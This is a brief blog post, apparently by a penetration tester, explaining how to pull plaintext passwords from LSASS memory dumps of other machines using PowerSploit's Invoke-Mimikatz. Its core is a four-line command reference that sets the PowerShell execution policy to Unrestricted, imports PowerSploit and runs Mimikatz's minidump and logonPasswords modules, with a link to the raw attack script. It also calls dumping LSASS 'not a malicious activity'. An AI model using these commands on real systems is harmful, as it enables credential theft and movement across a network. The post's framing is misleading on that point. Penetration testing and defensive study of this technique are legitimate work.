Saturday, 20 August 2016

Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz


Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.

However, wanted to crack passwords for other systems!!!

Simply get LSASS dump from other machines - Not a malicious activity!
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.

Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.


Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module.\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'   





















Good references :
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780


No comments:

Post a Comment